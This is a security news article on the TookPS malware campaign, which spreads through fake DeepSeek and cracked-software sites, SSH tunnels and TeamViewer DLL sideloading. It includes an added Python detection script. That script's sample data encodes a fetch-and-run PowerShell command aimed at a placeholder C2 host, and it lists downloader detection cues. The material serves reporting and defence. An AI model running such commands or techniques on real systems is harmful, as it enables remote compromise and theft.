Hackers Exploit DeepSeek and RDP Tools to Spread TookPS Malware

Cybersecurity researchers have uncovered a large-scale malware campaign involving the TookPS downloader, which is distributed through lures posing as DeepSeek neural network tools and through fraudulent websites mimicking legitimate software platforms.

This campaign targets individual users and organizations alike by disguising malware as popular applications such as UltraViewer, AutoCAD, and SketchUp.

These tools, widely used in business environments, serve as bait to lure victims into downloading malicious files.

The campaign’s infection chain begins with Trojan-Downloader.Win32.TookPS, which infiltrates systems by posing as legitimate software.

Once installed, the downloader connects to a command-and-control (C2) server whose address is embedded in its code and retrieves malicious PowerShell scripts.

These scripts initiate a series of actions, including downloading and executing additional malware strains like Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon.

The attackers leverage these backdoors to establish covert remote access and execute arbitrary commands on compromised devices.

[Figure: TookPS malware, original command]

Technical Details of the Attack

The TookPS malware employs a multi-stage infection process designed to maximize its reach and effectiveness.

Upon execution, the downloader retrieves base64-encoded PowerShell commands from its C2 server.

These commands sequentially download three scripts:

  1. The first script installs an SSH server using “sshd.exe,” along with its configuration file and RSA key for authentication. This creates a secure tunnel between the victim’s device and the attacker’s remote server, enabling full system access.
  2. The second script configures the SSH server with parameters such as remote server address, port number, and username, allowing attackers to control the infected system.
  3. The third script downloads additional malware strains, including Backdoor.Win32.TeviRat, which uses DLL sideloading to modify TeamViewer software for covert remote access.

The attackers also deploy Backdoor.Win32.Lapmon through unknown delivery methods.

Both backdoors communicate with separate C2 domains registered in early 2024, indicating a well-coordinated infrastructure behind this campaign.
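The three stages described above map onto a few host-level detection heuristics: a PowerShell process launched with a base64-encoded command that decodes to a downloader, sshd.exe running from a non-standard location, and an unsigned DLL loaded from TeamViewer's own directory. The following Python applies them to constructed Sysmon-style events; it is an added example, not code from the report or the campaign, and the paths, field names, sample command and C2 hostname are assumptions.

```python
import base64
import re

# Standard Windows OpenSSH locations; sshd.exe anywhere else deserves a look.
SSHD_ALLOWED = (r"c:\windows\system32\openssh\sshd.exe", r"c:\program files\openssh\sshd.exe")
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "iwr ")
# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_powershell(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> list:
    """Apply the three TookPS-chain heuristics to one event and return any findings."""
    findings, image = [], event.get("image", "").lower()
    if event.get("type") == "process" and image.endswith("powershell.exe"):
        plain = decode_encoded_powershell(event.get("cmdline", ""))
        if plain and any(cue in plain.lower() for cue in DOWNLOAD_CUES):
            findings.append("encoded PowerShell downloader: " + plain.strip())
    if event.get("type") == "process" and image.endswith("sshd.exe") and image not in SSHD_ALLOWED:
        findings.append("sshd.exe launched from non-standard path: " + event["image"])
    if event.get("type") == "image_load" and image.endswith("teamviewer.exe"):
        dll = event.get("loaded", "")
        same_dir = dll.lower().rsplit("\\", 1)[0] == image.rsplit("\\", 1)[0]
        if same_dir and event.get("signed", "").lower() != "true":
            findings.append("unsigned DLL beside TeamViewer.exe (possible sideloading): " + dll)
    return findings


def scan(events: list) -> list:
    return [finding for event in events for finding in analyze(event)]


# Constructed sample events (not real telemetry); c2.example.invalid is a placeholder host.
ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/1.ps1')"
                       .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENC},
    {"type": "process", "image": r"C:\Users\Public\sshd.exe", "cmdline": "sshd.exe -f sshd_config -h key.rsa"},
    {"type": "process", "image": r"C:\Windows\System32\OpenSSH\sshd.exe", "cmdline": "sshd.exe"},
    {"type": "image_load", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "loaded": r"C:\Program Files\TeamViewer\version.dll", "signed": "false"},
    {"type": "image_load", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "loaded": r"C:\Windows\System32\version.dll", "signed": "true"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Running the block flags the encoded downloader, the sshd.exe under C:\Users\Public and the unsigned DLL in the TeamViewer folder, while the legitimate OpenSSH server and the signed system DLL pass.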

Exploitation of Remote Desktop Tools

In addition to leveraging DeepSeek neural networks as lures, the attackers have targeted remote desktop tools such as UltraViewer by creating fraudulent websites offering cracked versions of these applications.

[Figure: TookPS malware, malicious websites]

Domains like “ultraviewer[.]icu” and “autocad-cracked[.]com” were identified as part of this scheme. These sites mimic legitimate platforms to deceive users into downloading infected files.

The campaign uses advanced techniques such as DLL sideloading to modify legitimate software behavior while remaining undetected by users.

For instance, TeamViewer’s functionality is altered by placing malicious libraries alongside its executable files, granting attackers hidden access to compromised systems.

According to the report, this campaign highlights the growing sophistication of cyberattacks targeting both personal and business-critical software.

By impersonating trusted tools like DeepSeek and popular applications, attackers can infiltrate networks with relative ease.

Once inside, they gain complete control over infected devices through SSH tunnels and backdoors.

To mitigate these risks, cybersecurity experts recommend avoiding pirated or unofficial software sources and implementing strict security policies within organizations.

Regular employee training on recognizing phishing attempts and malicious downloads is critical for maintaining vigilance against such threats.

The TookPS malware campaign serves as a stark reminder of the importance of robust cybersecurity measures in an increasingly interconnected digital landscape.


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
